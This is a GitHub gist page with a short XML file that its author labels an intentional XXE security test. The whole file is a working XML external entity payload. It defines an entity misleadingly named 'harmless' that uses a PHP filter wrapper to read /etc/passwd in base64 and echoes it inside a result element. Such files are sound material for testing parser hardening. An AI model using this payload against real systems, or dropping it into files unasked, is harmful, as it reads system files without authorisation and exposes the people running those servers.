Created
March 2, 2022 13:42
-
-
Save LionsAd/b5a87d53428cc86a773ebcd5eac81988 to your computer and use it in GitHub Desktop.
A XML file with a XEE attack included (intentional security test)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<!DOCTYPE results [ | |
<!ENTITY harmless SYSTEM | |
"php://filter/read=convert.base64-encode/resource=/etc/passwd" | |
> | |
]> | |
<results> | |
<result>&harmless;</result> | |
</results> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment